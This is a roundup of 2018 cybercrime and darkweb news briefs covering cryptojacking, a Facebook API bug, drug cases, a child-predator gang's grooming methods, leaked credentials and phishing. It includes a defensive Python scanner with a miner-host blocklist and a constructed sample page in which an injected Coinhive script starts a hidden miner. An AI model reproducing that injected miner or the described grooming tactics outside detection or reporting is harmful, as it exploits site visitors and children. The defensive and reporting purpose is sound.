Cryptojacking malware infections have risen 400% in 2018 according to Kaspersky Lab

According to anti-virus firm Kaspersky Lab, 2018 saw a fourfold surge in cryptocurrency-mining malware in the Middle East, Turkey, and Africa (META) regions. Some 13 million infections were registered around the world by such malicious software, which diverts a portion of the host computer’s processing power to mining cryptocurrency for the attacker, a fourfold increase from 3.5 million cases in 2017.

It’s important to know that there are two types of cryptojacking:

1) The first type involves mining software installed directly on the host computer. It is usually delivered through malicious links or some form of scam or deceit.

2) The second type refers to in-browser mining scripts that run for as long as the visitor stays on the page. Some are legitimate mining scripts installed by the website owners themselves, while others are malicious scripts injected by third-party actors. The former is considered the safest form of cryptojacking, since it is approved by the website owner, while the latter exploits both the website and its visitors. Most of the hidden scripts were injected into streaming websites, especially pornographic or pirating sites, forums, and similar places where users tend to spend a lot of time.

The source code on a cryptojacking website with the beneficiary wallet address. Screenshot author Pranshu Bajpai, CC BY-ND

Some might argue that almost all cryptojacking cases are unethical, hence the name ‘jacking.’ The embedded mining software is almost never brought to the attention of the visitor; instead it runs secretly, without disclosure, entirely at the expense of users who may not even realize that their processing power and electricity are being spent to create and send cryptocurrency to an unknown wallet. It is important to keep in mind that even when unnoticeable, the mining process drains the battery, consumes electricity, and works the processor and video card, which in turn can make the system run slowly, reduce its lifespan, or even damage the hardware through overheating.

An example of CPU overutilization from hidden cryptocurrency mining in an extension

Although the whole world is affected by the attacks, less-developed countries from Africa, South America, and the Middle East seem to experience the majority of the attacks.

A February 2018 study by Bad Packets Report found that 34,474 websites were running Coinhive, the most popular cryptojacking JavaScript. Separate research from AdGuard put the total profit from cryptojacking at around $150,000 per month, of which a third goes to the mining network and the rest to the website owner.
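The in-browser miners described above leave recognisable traces in a page’s HTML: a loader script pulled from the miner’s host and an inline call that starts the miner with the beneficiary’s site key. The following is an added defensive example, not code from the article or from Bad Packets; the indicator list (the coinhive.com host and the `CoinHive.Anonymous` constructor, plus a placeholder host) and the sample page are assumptions constructed for the demonstration.

```python
"""Defensive scanner for in-browser mining indicators in fetched HTML."""
import re
from dataclasses import dataclass
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed indicator set for this example. Coinhive is the miner the article
# names; its public integration loaded a script from coinhive.com and created
# the miner with `new CoinHive.Anonymous('<site key>')`, the site key being
# the identifier the mined coins are credited to. 'example-miner.invalid' is a
# placeholder for where a defender would plug in their own blocklist.
MINER_HOSTS = {"coinhive.com", "example-miner.invalid"}
MINER_API = re.compile(
    r"new\s+CoinHive\.(?:Anonymous|User)\s*\(\s*['\"]([A-Za-z0-9]{8,})['\"]",
    re.IGNORECASE,
)


@dataclass
class Finding:
    kind: str    # "script_src" (external loader) or "inline_api" (miner start)
    detail: str  # matched host, or the beneficiary site key
    line: int    # line of the <script> tag in the scanned document


class _MinerScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []
        self._script_line = None  # set while inside a <script> element

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        self._script_line = self.getpos()[0]
        src = dict(attrs).get("src") or ""
        host = (urlparse(src).hostname or "").lower()
        # Match the blocklisted host itself or any subdomain of it.
        if any(host == h or host.endswith("." + h) for h in MINER_HOSTS):
            self.findings.append(Finding("script_src", host, self._script_line))

    def handle_endtag(self, tag):
        if tag == "script":
            self._script_line = None

    def handle_data(self, data):
        # Script bodies arrive here as raw text; look for the miner constructor.
        if self._script_line is None:
            return
        for match in MINER_API.finditer(data):
            self.findings.append(
                Finding("inline_api", match.group(1), self._script_line)
            )


def scan_html(html):
    """Return the list of mining indicators found in an HTML document."""
    parser = _MinerScanner()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample page mimicking a streaming site with a hidden miner.
SAMPLE_PAGE = """<html><head><title>Free streaming</title>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
</head><body>
<script>
  var miner = new CoinHive.Anonymous('EXAMPLESITEKEY0000', {throttle: 0.3});
  miner.start();
</script>
<p>Enjoy the video.</p></body></html>"""

if __name__ == "__main__":
    for f in scan_html(SAMPLE_PAGE):
        print(f"line {f.line}: {f.kind} -> {f.detail}")
```

Run against saved page sources or a crawler’s output; a hit on either indicator is a reason to block the page or to compare the site key against what the site owner disclosed.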

There are exceptions to the rule, however: cases in which websites ask for the explicit consent of the user before using some of their processing power to generate cryptocurrency. Transparent cases such as these are considered legitimate and safe. For example, this UNICEF website asks your permission to mine cryptocurrency in your browser for charity.

Although mining scripts are merely tools that can even serve a useful purpose, as mentioned above, the situation got out of hand. A few months ago, Google announced a general ban on all extensions involving cryptocurrency mining in its Chrome browser, whether white or black hat.

“Until now, Chrome Web Store policy has permitted cryptocurrency mining in extensions as long as it is the extension’s single purpose, and the user is adequately informed about the mining behavior. Unfortunately, approximately 90% of all extensions with mining scripts that developers have attempted to upload to Chrome Web Store have failed to comply with these policies, and have been either rejected or removed from the store.”

Individuals are not the only ones targeted: businesses are too. Company-owned computers are sought-after targets since they run continuously, in large numbers, and usually lack adequate security controls. Moreover, hackers have adapted the script-injection methodology specifically for commercial companies through ‘formjacking’: malicious JavaScript inserted into a website’s payment process to capture credit card information as it is entered. Most recently, in June 2018, Ticketmaster had 40,000 customer records compromised, and in September 2018, British Airways suffered a similar attack affecting 400,000 clients.

As a first line of defense, the National Cyber Security Centre’s board toolkit is an excellent starting point. Ad blockers, antivirus programs, and browsers that block mining scripts are must-haves against cryptojacking.

SOURCES:

https://www.postonline.co.uk/commercial/3912976/hiscoxs-james-brady-on-why-cyber-knowledge-remains-a-barrier

http://theconversation.com/cryptojacking-spreads-across-the-web-94088

https://www.bleepingcomputer.com/news/security/around-5-percent-of-all-monero-currently-in-circulation-has-been-mined-using-malware/

https://badpackets.net/how-to-find-cryptojacking-malware/

https://www.csoonline.com/article/3253572/internet/what-is-cryptojacking-how-to-prevent-detect-and-recover-from-it.html

https://blog.chromium.org/2018/04/protecting-users-from-extension-cryptojacking.html

https://media.kasperskycontenthub.com/wp-content/uploads/sites/58/2018/06/27125925/KSN-report_Ransomware-and-malicious-cryptominers_2016-2018_ENG.pdf


A 21-year-old German received just 60 hours of community work for ordering darkweb cannabis for personal consumption

Daniel F. (not his real name), 21 years of age, ordered hundreds of grams of darknet marijuana for personal consumption through the post office in the German district of Pfaffenhofen. More precisely, he placed orders of about 100 to 250 grams of marijuana at a time, for a total of 800 grams paid in bitcoin. The judge gave the young man 60 hours of community work alongside drug rehabilitation.

The defendant was judged by juvenile justice standards despite being 21 years old, and thus received a light sentence compared to the minimum one-year imprisonment that the adult penal code prescribes for the purchase of marijuana for personal use. The change in the applicable regime was made because of the defendant’s lack of criminal priors and good behavior, and also because the offenses started when he was 18 years old and no criminal enterprise was found.

Judge Ulrich Klose summed up the reasoning himself:

“That was a massive offense, but juvenile justice is about education.”

The judge then asked Daniel whether he had quit drugs:

“Then we could take a hair sample from you?”

To which the defendant replied:

“No problem. Actually, I always wanted to stop it.”

The representative of the juvenile court confirmed the good behavior, saying he has volunteered in social and civic actions, traveled the world, and completed two internships.

It is clear that not only public opinion but also judicial practice has changed drastically when it comes to marijuana consumption. Such light sentences were unheard of in past decades. A similar case happened in Austria, where a man who funded his cannabis habit with counterfeit euros received only two months of prison time.

SOURCE: https://www.donaukurier.de/lokales/pfaffenhofen/DKmobil-Drogen-aus-dem-Darknet;art600,4018378

Facebook exposed the private and unpublished pictures of 6.8 million users due to an API bug that gave unhindered access to 1,500 apps

On 4 December 2018, Facebook announced that up to 1,500 apps created by 876 developers had had unrestricted access to users’ profile images, including unpublished photos and photos set to private. The application programming interface (API) bug affected users from 13 September to 25 September 2018 and concerned applications that had requested access to profile images.

Facebook users who had granted access to any of the 1,500 affected third-party apps unknowingly gave those apps unhindered access to their profile images, whether public or private.

Affected users are being identified and notified by the company. Users can also access the following dedicated page to see if they’re affected: https://www.facebook.com/help/200632800873098

Tomer Bar, a Facebook developer, explained the Photo API bug:

“When someone gives permission for an app to access their photos on Facebook, we usually only grant the app access to photos people share on their timeline. In this case, the bug potentially gave developers access to other photos, such as those shared on Marketplace or Facebook Stories. The bug also impacted photos that people uploaded to Facebook but chose not to post. For example, if someone uploads a photo to Facebook but doesn’t finish posting it – maybe because they’ve lost reception or walked into a meeting – we store a copy of that photo for three days so the person has it when they come back to the app to complete their post.

Currently, we believe this may have affected up to 6.8 million users and up to 1,500 apps built by 876 developers. The only apps affected by this bug were ones that Facebook approved to access the photos API and that individuals had authorized to access their photos.

We’re sorry this happened. Early next week we will be rolling out tools for app developers that will allow them to determine which people using their app might be impacted by this bug. We will be working with those developers to delete the photos from impacted users.

We will also notify the people potentially impacted by this bug via an alert on Facebook. The notification will direct them to a Help Center link where they’ll be able to see if they’ve used any apps that were affected by the bug. (See example of user notification below)

We are also recommending people log into any apps with which they have shared their Facebook photos to check which pictures they have access to.”

Facebook users were exposed to this bug for 12 days, but it is unclear whether anyone exploited it. Such API errors are not uncommon among large corporations: earlier this year, Twitter and Google were also affected by similar bugs that exposed the information of over 50 million people.

Source: https://developers.facebook.com/blog/post/2018/12/14/notifying-our-developer-ecosystem-about-a-photo-api-bug/

A 52-year-old Turkish dealer sentenced to nine years and nine months in Germany for Deepweb drug trafficking


At the end of November 2018, a 52-year-old Turkish man residing in Germany was sentenced to nine years and nine months in prison for distributing hard drugs both on the streets and on the darkweb. The criminal police in Mühldorf, Germany, declared it one of the lengthiest investigations in their history since the establishment of Commissariat 4 for drug-related crimes.

The investigation was code-named “Vehicle” after the first piece of information the Kriminalpolizei of Mühldorf acquired about the target: that he was a car salesman.

In September 2017, the investigation group “Vehicle” was created to hunt down the criminal organization trafficking a relatively large amount of drugs in the region, enough to be considered the biggest dealers in the Bavarian town of Altötting.

Amphetamine, painkillers, marijuana, ecstasy, and cocaine were among the narcotics sold by the network. In addition to a secret drug and money hideout in the city center, a bar in the town of Neuötting was a common place for the gang members to meet. Each member had their own duties; some were “runners” while others were “negotiators.”

The first breakthrough came in October 2017 when a courier for the gang was caught at a police checkpoint on the A94 highway. He was transporting several kilos of marijuana, one kilo of amphetamine, and large amounts of ecstasy and cocaine. The bust led to the raid and arrest of the 52-year-old ringleader in November 2017.

Shortly afterward, comprehensive charges were brought against a variety of people involved. Criminal proceedings ensued against 50 other defendants, including darknet buyers and sellers, which prompted court-ordered search raids at 20 further locations.

The operation was a complete success, and the investigation squad, which consisted of six officials, was dissolved.

SOURCE: https://www.polizei.bayern.de/oberbayern/news/presse/aktuell/index.html/289815

Border customs investigators arrested 32-year-old Dutchman in Germany for selling drugs on the Darknet

The Frankfurt Customs Investigation Office arrested a 32-year-old Dutchman in North Rhine-Westphalia on Tuesday, 11 December 2018, after a sting operation. The operation was under the direction of the NRW cybercrime task force in the Lower Rhine town of Kleve.

Investigators announced on Thursday that the man is in custody. He is accused of selling marijuana, hashish, cocaine, amphetamines, and ecstasy tablets internationally on the darkweb.


Law enforcement had been targeting the suspect since last summer. According to Cologne prosecutors, police found several kilograms of drugs, including 10,000 ecstasy pills, between his residence in the Netherlands and a holiday house in the Dutch province of Gelderland. Narcotics paraphernalia, laboratory utensils, and packaging material were also found.

The man is facing a long prison term regardless of which country tries him, Germany or the Netherlands. Suspects caught between two or more jurisdictions will try their best to be tried in the country whose laws favor them. Although both countries have relaxed laws for personal consumption, they have equally severe laws for hard drug trafficking.

Source: https://www.presseportal.de/blaulicht/pm/116258/4142305

https://www.welt.de/regionales/nrw/article185454080/Drogen-uebers-Darknet-verkauft-Dealer-festgenommen.html

Nine members of the sexual predator gang called “Bored Group” sentenced to up to 40 years in prison

The group called “Bored Group” was sentenced at the beginning of December for manipulating underage girls on the internet into self-harm and sexual acts.

Christian Maire of Binghamton, N.Y., 40 years of age at the time of sentencing and a married father of two, was the ringleader of the organization and received the longest prison term, 40 years. He was caught with the help of a former victim who cooperated with the FBI.

Other culprits received similar prison terms:

  1. Arthur Simpatico, 47 years old, of Mississauga, Ontario, Canada. Sentenced to 38 years;
  2. Jonathan Negroni Rodriguez, 37 years old, of West Hollywood, California. Sentenced to 35 years;
  3. Michal Figura, 36 years old, of Swarthmore, Pennsylvania. Sentenced to 31¼ years;
  4. Odell Ortega, 37 years old, of Miami. Sentenced to 37½ years;
  5. Brett Jonathan Sinta, 36 years old, of Hickory, North Carolina. Sentenced to 30½ years;
  6. Caleb Young, 38 years old, of Cuyahoga Falls, Ohio. Sentenced to 30 years;
  7. Daniel Walton, 34 years old, of Saginaw, Texas. Sentenced to 30½ years;
  8. William T. Phillips, 39 years old, of Highland, New York. Sentenced to 33 years.

The organization lured young girls aged 8 to 17 through social media and online chatrooms, posing as a group of teenage boys. After elaborate psychological manipulation to win their trust, the girls were asked to perform sexual acts and, in a few instances, to self-harm.

Using fake profiles, pictures, and videos of young boys, the gang acted convincingly on teenage dating websites such as MyLOL.com, Gifyo, Periscope, and YouNow. Each member had a role and worked systematically. The group would comment on old, non-sexual posts by girls to stand out from the crowd, and then send chatroom invitations.

The psychological bond between the group and the victims was developed over long periods of time around topics like school, family, sports, and sex. The final manipulative strategies to get the victims to undress were also well thought out. For example, dares or challenges would gradually progress to sexual requests, accompanied by strategic compliments. Another technique involved competitions between victims to see who would perform the most outrageous actions. But probably the most notable psychological tactic was the group’s frequent use of the word “bored” to appear authentic and reassuring. Apart from being in the name of the group, chatrooms or certain posts were also called “justsobored,” “borednstuff,” and “boredascanbe.” The word was used to give the illusion of a bored group of innocent teenage boys.

The organization also had a defensive strategy. First, as stated before, the group never commented on sexual posts. Second, the group ran an entire network of “Hero” or “White Knight” investigation teams that would alert the group to people who might warn a victim of the scheme. Such networks were also used for other purposes and existed both inside and outside the group’s nucleus. Moreover, archives were kept with the personal information of each victim, as well as other details of past or current scams. Chatrooms were also categorized into “camping rooms,” where victims were expected to return, and “regular rooms,” where victims would appear at least once per week.

The downfall of the group started in 2017 when a group member linked the “Bored Group” to news of the arrest of an unrelated sexual predator, which confirmed the FBI’s suspicions.

Some of the victims spoke up about the mental and social scars. A woman from New Orleans, tricked when she was 16, declared last week at the sentencing:

“I am a 20-year-old girl standing here today, facing the monsters that destroyed my childhood due to child exploitation. (…) I enjoyed having ‘friends’ to talk to every day. They were always there no matter what time of day.”

The woman described how she was tricked into the scheme. Several videos were made of her and used for blackmail. The stress and psychological abuse led to self-harm, hospitalization, and even suicide attempts:

“I know they knew I was hurting, because they would watch me cry and some would even ask me to self-harm while they watched. Thinking back to those days causes me to cry myself to sleep, wondering when the monsters will stop haunting me.”

The group members sobbed as well upon hearing the decades of punishment they have to face. The leader of the group begged for mercy, and although U.S. District Judge Stephen Murphy spared him life in prison, the final sentence totaled not a day less than four decades.

Source: https://eu.freep.com/story/news/local/michigan/detroit/2018/12/12/sexual-predators-christian-maire-teen-girls-online/2233922002/

Over 40,000 government accounts from Saudi Arabia, Italy, Israel, Portugal, Switzerland, Norway, Georgia, Bulgaria, and Romania have been found on the Darkweb

Over 40,000 accounts for government websites were found on the darkweb, from countries including Saudi Arabia, Italy, Israel, Portugal, Switzerland, Norway, Georgia, Bulgaria, and Romania.

More than half of the accounts (52%) belong to Italian government officials, followed by Saudi Arabian government accounts (22%), and Portugal government accounts (5%).

Group-IB is a Russian IT security firm headquartered in Moscow and is considered one of the top global vendors of threat intelligence. Alexandr Kalinin, head of Group-IB’s Computer Emergency Response Team (CERT-GIB), explained that the access credentials were most likely for sale. Their research indicated that the hackers used fairly common malware and trojans to gather the list. The malware families likely used include Pony, AZORult Infostealer, and Qbot.

Mr. Kalinin believes the list was acquired over time from large samples of victims around the world and then categorized into public officials and private individuals. Although the credentials vary significantly in importance, from local portals to high-level governmental websites, they still pose a high risk in the hands of a determined attacker.

The compromised accounts came from a wide array of government agencies, ranging from local government sites to state-level agencies and official government portals. Some of the most high-profile portals offered by the hackers include Switzerland (admin.ch), Poland (gov.pl), Bulgaria (government.bg), Romania (gov.ro), the Norwegian Directorate of Immigration (udi.no), the Ministry of Finance of Georgia (mof.ge), the Israel Defense Forces (idf.il), the Italian Ministry of Defense (difesa.it), the Ministry of Foreign Affairs of Romania, and the Ministry of Foreign Affairs of Italy.

“The scale and simplicity of government employees’ data compromise shows that users, due to their carelessness and lack of reliable cyber defense, fall victims to hackers. Cybercrime has no borders and affects private and public companies and ordinary citizens,” declared Alexandr Kalinin.

Group-IB began its investigation following a discovery by the security firm Agari, which identified another group of scammers holding a similar list of 50,000 global CEOs, most likely used for reconnaissance ahead of Business Email Compromise (BEC) scams.

Source: https://www.zdnet.com/article/over-40000-credentials-for-government-portals-found-online/

Hackers have recently auctioned data of some Brazilian companies, financial institutions, and startups on the Deepweb for $320,000

Brazilian security firm Tempest has investigated recent darkweb auction rooms run by the so-called “InfoSec Army.” The data sold was extracted from various Brazilian corporations, financial groups, and small businesses. Tempest estimated a total profit of $320 thousand in bitcoin by the end of August 2018:

“Some databases would have been sold on the InfoSec Army in trading sessions with more than 700 bids, and the most valuable base would have been sold for six bitcoins. The forum contained the date and time of the trading sessions and information about each of the items for sale. The reverse auction itself happened in Telegram groups.

The InfoSec Army page was taken off the air in August 2018; however, among the data for sale were users and passwords, administrative access to attacked environments, copies of documents, source codes, emails, images, and even complete databases. These archives can be combined with several others and used in different scams like opening accounts, extortion, or performing fraudulent transactions.

Vendors gave detailed descriptions of the ways they used to steal the data. Some evidence and samples were also offered so that buyers could validate the data.

In one case, the attacker says he bought access to a control panel with more than 2000 zombie computers. Investigating these computers, he arrived at the workstation of an employee of one of the companies that had the data stolen. From this station the attacker was able to move around the network, identify outdated systems and obtain administrative access to the domain controller, from where it was possible to access any computer on the network,” declared Tempest.

Although Brazil has been taking significant steps in the right direction with regard to cybersecurity, such attacks persist. A 2017 study from Norton Cyber Security indicated that Brazil is the second most cyber-attacked country, with 62 million people affected at a cost of $22 billion. Coincidentally, the data auction took place just a few weeks after the Brazilian Army’s Cyber Defense Command executed an unprecedented military and civilian exercise at Fort Marechal Rondon, Brazil, between 3 and 6 July 2018. The markets are hopeful that the new president-elect, Jair Bolsonaro, will maintain his strong anti-corruption stance and extend it to cleaning up internet crime as well.

SOURCE:

https://www.scriptbrasil.com.br/vida-digital/hackers-leiloando-dados-deep-web.html

https://dialogo-americas.com/en/articles/brazilian-army-conducts-unprecedented-cyberdefense-exercise

How the wedding of Lionel Messi was successfully shielded from information leaks by security expert Fernando Villares

Back in June 2017, famous soccer player Lionel Messi wanted a secure wedding from which no information could leak out of the party premises. Fernando Villares of the company InteliX Ingeniería was in charge of security at the wedding and succeeded in isolating the perimeter from the outside world using free software and tools. Most interestingly, the guests were all carrying phones.

At VoIP2Day 2018, held a few weeks ago in Madrid, Fernando Villares gave a talk entitled “Security is not a game, football YES,” in which he explained his methodology.

It all started when Fernando found a reward of the equivalent of $12,500 in bitcoin on the dark web for the guest list and other information about Messi’s wedding. He reached out to Messi through the wedding organizer Adrián Pavía, a mutual friend, and ended up working for Messi, as no cybersecurity was in place for the event whatsoever.

First of all, the City Center casino hotel in Rosario, Argentina, had been open to the public in the preceding days. The venue had to be prepared for a private party with a large number of athletes, models, employees, suppliers, and organizers, and some €1.7 million in insurance coverage.

Although there was a confidentiality agreement and a prohibition on bringing telephones into the area, another contractual clause prevented the organizers from confiscating any phones. Besides, enforcing the rule was not viable anyway given the VIP status of each guest. Furthermore, the environment included a variety of radio signals, Bluetooth connections, extensive computer equipment, lighting and sound systems, and external threats such as drones and paparazzi. Fernando had to anticipate all of the above in his security model. The solution, therefore, was to prevent communications without interfering with the event equipment.

The first step of the operation was a physical examination of the area, during which a hidden camera was found. Secondly, an open source intelligence (OSINT) study was carried out on the guests, suppliers, and staff. Finally, the team analyzed the radio spectrum with simple Digital Terrestrial Television cards, encrypted all computer assets, and trained key employees with access to sensitive information.

More precisely, communications were encrypted with TLS and SRTP profiles, disposable SIM cards were used, and internal communication was carried out through Telegram and walkie-talkies on scrambled VHF frequencies.

When all of the internal security systems were in place, the team built an informational “bunker” by asking the Ministry of Justice for authorization to use equipment capable of blocking GSM 2G, 3G, and 4G, and WiFi on the 2.4 and 5.8 GHz bands, which as a consequence also blocked Bluetooth and DECT cordless telephones. It was the first time such security measures were deployed at a civilian event in Argentina.

As post-event precautions, the squad had a global detection system to see in real time whether anything was leaking, as well as bots on social networks that searched for keywords. They also established a wired zone for the television channels’ digital transmitters, so that if a crew left it, they lost the signal.

The mission was a success, and no unwanted photos or videos came out of the event. As a fun fact, some media outlets accused the security experts of working for Israel just because the team used the keyword “Mossad.”

Source:

https://www.xatakamovil.com/seguridad/asi-se-blindaron-comunicaciones-boda-messi


Warning to all Amazon, Paypal, and Sparkasse bank customers against phishing attempts

Multiple instances of ongoing e-mail phishing against Amazon, Paypal, and Sparkasse customers have been registered in the past few days. The attackers are currently sending e-mails that ask consumers to enter their data under false claims and pretexts, as reported by the consumer center of North Rhine-Westphalia.

One e-mail falsely claimed that legislation had changed due to Brexit, therefore requiring the user to re-enter personal information or credentials. This particular e-mail, sent on 6 December, cited a deadline at the end of November that had already passed. Attackers routinely include a submission deadline in their e-mails to put psychological pressure on the victim, tied to a false claim or pretext: for example, invoking newly passed legislation such as the recent EU data protection regulation, a significant change in company policy, or similar vague excuses.

Internet users should have antivirus software installed on all devices and should pay attention to the fine details that give phishing traps away. Things to look out for include the absence of “https,” spelling and grammatical errors, unclickable brand logos, and unnatural link redirections or forms. Bear in mind that the creators are getting more and more sophisticated and experienced, so nothing is foolproof. Users should exercise caution and skepticism at all times.

The financial group Sparkasse asks everyone to forward any suspicious e-mails to “warnung@sparkasse.de” and then delete them.


Sources:
https://www.verbraucherzentrale.nrw/wissen/digitale-welt/phishingradar/phishingradar-aktuelle-warnungen-6059